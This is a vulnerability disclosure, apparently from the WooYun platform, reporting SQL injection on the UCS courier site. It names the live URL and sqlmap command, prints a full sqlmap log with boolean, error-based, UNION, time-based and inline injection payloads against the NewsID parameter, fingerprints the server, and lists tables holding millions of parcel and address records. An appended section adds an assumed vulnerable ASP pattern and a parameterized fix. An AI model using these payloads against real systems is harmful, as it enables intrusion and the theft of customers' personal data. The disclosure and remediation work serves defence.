Vulnerability summary
Title: UCS official website SQL injection can lead to the leak of 30 million express waybill records
Submitted: 2015-10-04 18:08
Fixed: 2015-11-18 18:10
Published: 2015-11-18 18:10
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 20
Status: vendor could not be contacted, or the vendor actively ignored the report
Tags: none
Vulnerability details
Disclosure status:
2015-10-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-18: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description: UCS is a well-known express carrier. A friend used their service for a purchase, so I tested it in passing.
Currently, we can ship from the following countries to China, Hong Kong, and Taiwan:
· United States (CA, NY, DE)
· Amsterdam, Netherlands
· France
· Germany
· Japan
· London, England
· Melbourne/Sydney, Australia
· Vancouver, Canada
· Vienna, Austria
Detailed description:
Injection point: python sqlmap.py -u "http://www.ucsus.com/News.asp?Method=View&NewsID=170"
[sqlmap screenshot]:
[Database screenshot]: row counts are marked in the screenshot
+----------------------------------+----------+---------------------------+
| Table                            | Entries  | Contents                  |
+----------------------------------+----------+---------------------------+
| dbo.UCS_PackageStatusLOG         | 33814513 | package status            |
| dbo.UCS_SenderAddress            |  3980814 | sender/receiver addresses |
| dbo.UCS_ReceiveAddress           |  3959837 | sender/receiver addresses |
| dbo.UCS_ReceivePackage_History   |  1948694 | history records           |
+----------------------------------+----------+---------------------------+
Database information (the sqlmap listing of every table in the UCS database with its entry count, from which the row counts above are taken):
Proof of vulnerability: [full sqlmap run]
[17:15:19] [INFO] testing connection to the target URL
[17:15:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
[17:15:29] [INFO] target URL is stable
[17:15:30] [INFO] heuristics detected web page charset 'ascii'
[17:15:30] [INFO] heuristic (basic) test shows that GET parameter 'NewsID' might be injectable (possible DBMS: 'Microsoft SQL Server')
[17:15:31] [INFO] testing for SQL injection on GET parameter 'NewsID'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[17:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:16:08] [INFO] GET parameter 'NewsID' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:16:08] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:16:09] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase inline queries' injectable
[17:16:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:16:09] [WARNING] time-based comparison requires larger statistical model, please wait....................
[17:16:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:16:28] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[17:16:34] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[17:16:38] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[17:17:39] [INFO] GET parameter 'NewsID' seems to be 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' injectable
[17:17:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:17:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:17:41] [WARNING] reflective value(s) found and filtering out
[17:17:41] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:17:44] [INFO] target URL appears to have 8 columns in query
[17:17:55] [INFO] GET parameter 'NewsID' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'NewsID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 53 HTTP(s) requests:
---
Parameter: NewsID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Method=View&NewsID=170 AND 2212=2212

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Method=View&NewsID=170 AND 3021=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3021=3021) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: Method=View&NewsID=-4728 UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(97)+CHAR(117)+CHAR(72)+CHAR(102)+CHAR(85)+CHAR(87)+CHAR(71)+CHAR(116)+CHAR(109)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: Method=View&NewsID=-9061 OR 6159=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: Method=View&NewsID=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3277=3277) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113))
---
[17:18:30] [INFO] testing Microsoft SQL Server
[17:18:31] [INFO] confirming Microsoft SQL Server
[17:18:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
Fix recommendation: (none given)
Copyright notice: please credit the source when reposting. 路人甲 @乌云
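The report leaves the fix section empty. Added here as an example (not UCS's code, which the report never shows) is the classic-ASP lookup pattern that matches the observed payloads (NewsID concatenated unquoted into the query, as the unquoted `170 AND 2212=2212` payload implies), beside a hardened form that validates the parameter and binds it through ADODB. The table name UCS_News, its column names, and an open ADODB.Connection called conn are assumptions.

```vbscript
<%
' Assumed vulnerable pattern behind News.asp (reconstructed from the payload
' shape, not taken from the vendor's source): the query string value is
' concatenated straight into T-SQL, so "170 AND 2212=2212" is parsed as SQL.
Dim newsId
newsId = Request.QueryString("NewsID")
' sql = "SELECT Title, Body FROM UCS_News WHERE NewsID=" & newsId   ' injectable
' Set rs = conn.Execute(sql)

' Hardened form: reject anything that is not a short run of digits, then pass
' the value as a typed parameter so SQL Server never parses it as code.
Const adCmdText = 1, adInteger = 3, adParamInput = 1

Function IsPlainInteger(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"   ' digits only: blocks spaces, keywords, parentheses
    IsPlainInteger = re.Test(value)
End Function

If Not IsPlainInteger(newsId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid NewsID"
    Response.End
End If

Dim cmd, rs
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn   ' conn: an already open ADODB.Connection (assumed)
cmd.CommandType = adCmdText
' The "?" placeholder is filled by the bound parameter below; the value is sent
' to SQL Server as an integer, never as part of the statement text.
cmd.CommandText = "SELECT Title, Body FROM UCS_News WHERE NewsID = ?"
cmd.Parameters.Append cmd.CreateParameter("@NewsID", adInteger, adParamInput, , CLng(newsId))
Set rs = cmd.Execute
%>
```

The sqlmap run also enumerated every table in the database, which shows the web login held far more than read access to the news table; pairing the parameterized query with a database account limited to SELECT on the tables the public site actually needs bounds what any remaining injection could reach.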
Vulnerability response
Vendor response: vendor could not be contacted, or the vendor actively refused
Vulnerability rank: 15 (WooYun rating)